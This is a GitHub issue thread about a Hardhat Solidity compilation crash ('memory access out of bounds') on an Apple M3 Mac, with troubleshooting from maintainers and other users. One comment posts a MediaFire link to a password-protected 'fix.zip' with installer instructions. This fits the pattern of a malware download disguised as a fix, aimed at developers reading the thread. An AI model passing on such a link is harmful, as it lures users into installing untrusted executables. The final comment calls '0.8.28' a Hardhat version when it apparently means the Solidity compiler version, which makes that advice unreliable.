### ISSUE TITLE
RuntimeError: memory access out

### ISSUE THREAD

**Issue by GeorgeKvara** [NomicFoundation/hardhat#5686]
### Version of Hardhat

2.22.2

### What happened?

After typing command `nx compile hardhat` I have few errors. It does not execute. Before I was using other laptop, which was Ubuntu and everything was working well but yesterday I bought **mac m3 pro** and I set up the environment but whenever I run that mentioned command I have those errors and does not execute. Can anyone tell me what is the issue or either hardhat is having a bug?

```
Error: Command failed: /Users/MacBook/.nvm/versions/node/v18.18.0/bin/node /Users/MacBook/Hinkal-Protocol/libs/hardhat/node_modules/hardhat/internal/solidity/compiler/solcjs-runner.js /Users/MacBook/Library/Caches/hardhat-nodejs/compilers-v2/wasm/soljson-v0.8.17+commit.8df45f5f.js
RuntimeError: memory access out of bounds
    at wasm://wasm/04f5a63e:wasm-function[882]:0x36ef6
    at wasm://wasm/04f5a63e:wasm-function[140]:0x25baf
    at invoke_ii (/Users/MacBook/Library/Caches/hardhat-nodejs/compilers-v2/wasm/soljson-v0.8.17+commit.8df45f5f.js:110:36997)
    at wasm://wasm/04f5a63e:wasm-function[41581]:0x1259761
    at ccall (/Users/MacBook/Library/Caches/hardhat-nodejs/compilers-v2/wasm/soljson-v0.8.17+commit.8df45f5f.js:110:28355)
    at /Users/MacBook/Library/Caches/hardhat-nodejs/compilers-v2/wasm/soljson-v0.8.17+commit.8df45f5f.js:110:28746
    at runWithCallbacks (/Users/MacBook/Hinkal-Protocol/libs/hardhat/node_modules/solc/wrapper.js:151:24)
    at compileStandard (/Users/MacBook/Hinkal-Protocol/libs/hardhat/node_modules/solc/wrapper.js:207:14)
    at Object.compileStandardWrapper [as compile] (/Users/MacBook/Hinkal-Protocol/libs/hardhat/node_modules/solc/wrapper.js:214:14)
    at main (/Users/MacBook/Hinkal-Protocol/libs/hardhat/node_modules/hardhat/internal/solidity/compiler/solcjs-runner.js:26:23)

    at ChildProcess.exithandler (node:child_process:422:12)
    at ChildProcess.emit (node:events:517:28)
    at ChildProcess.emit (node:domain:489:12)
    at maybeClose (node:internal/child_process:1098:16)
    at Process.ChildProcess._handle.onexit (node:internal/child_process:303:5) {
  code: 1,
  killed: false,
  signal: null,
  cmd: '/Users/MacBook/.nvm/versions/node/v18.18.0/bin/node /Users/MacBook/Hinkal-Protocol/libs/hardhat/node_modules/hardhat/internal/solidity/compiler/solcjs-runner.js /Users/MacBook/Library/Caches/hardhat-nodejs/compilers-v2/wasm/soljson-v0.8.17+commit.8df45f5f.js'
}
```

### Minimal reproduction steps

Just running command again `nx compile hardhat`

### Search terms

RuntimeError: memory access out of bounds Mac M3 Pro

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GeorgeKvara** [comment]
can you explain me what is that and for what purposes do I need to download?

**Comment by GeorgeKvara** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

can you explain me what is that and for what purposes do I need to download?

**Comment by ChristopherDedominici** [comment]
Hi @GeorgeKvara, could you try to create a new Hardhat project using our default template and check if you still have the compilation issue? So we can understand if the problem is isolated to your current project or not.

Steps:
1. create a new folder and cd into it
2. init a package json (e.g.: `npm init -y`) and install hardhat `npm i hardhat`
3. initialize a new JavaScript hardhat project via `npx hardhat init` and install all the dependencies when asked during the initialization process
4. run `npx hardhat compile`

Also, in your current project, did you try to clear the cache using `npx hardhat clean`?

**Comment by yekongxingle** [comment]
I have the same problem, how can I solve it?

**Comment by schaable** [comment]
@yekongxingle, could you provide more details? Also, maybe try following @ChristopherDedominici's suggestion and share your results here?

**Comment by yekongxingle** [comment]
@schaable I didn't find out what the problem was. However, I successfully ran npx hardhat compile by deleting unnecessary contracts in the contracts folder.

**Comment by Noveleader** [comment]
I am facing similar issue, `RuntimeError: memory access out of bounds`. I am using `zsh`.
I recently cloned gmx-contracts:
```
git clone https://github.com/gmx-io/gmx-synthetics.git
``` 
I am using yarn version `1.22.19` and when I ran `yarn` followed by `yarn hardhat compile` I got the above error. I am using node version `16.20.2` which is recommended by the repo itself in the `.nvmrc` file. This issue recently emerged when I switched from linux `bash` terminal to my mac `zsh` terminal. I don't think so, it has anything to do with this issue though.

**Comment by kanej** [comment]
> I am facing similar issue, `RuntimeError: memory access out of bounds`. I am using `zsh`. I recently cloned gmx-contracts:
> 
> ```
> git clone https://github.com/gmx-io/gmx-synthetics.git
> ```
> 
> I am using yarn version `1.22.19` and when I ran `yarn` followed by `yarn hardhat compile` I got the above error. I am using node version `16.20.2` which is recommended by the repo itself in the `.nvmrc` file. This issue recently emerged when I switched from linux `bash` terminal to my mac `zsh` terminal. I don't think so, it has anything to do with this issue though.

I ran that repo in a codespace. I had to bump the version of node to 18, as the repo now requires node@18 to install vite. I had no issues compiling.

Could you run through the steps above to try and isolate the issue on your system:

Steps:

* create a new folder and cd into it
* init a package json (e.g.: npm init -y) and install hardhat npm i hardhat
* initialize a new JavaScript hardhat project via npx hardhat init and install all the dependencies when asked during the initialization process
* run npx hardhat compile

**Comment by Noveleader** [comment]
I am using node 18. I also think, why anyone should be doing all that, I mean we can just clone the repo, install the packages and ready to compile and deploy the contracts. I really found this amazing answer which solved this, here's the [link](https://github.com/ethereum/solidity/issues/13966#issuecomment-2453581206).

TLDR: Just set the version of hardhat to `0.8.28` as it is more optimized and can be handled easily with no access memory needed.
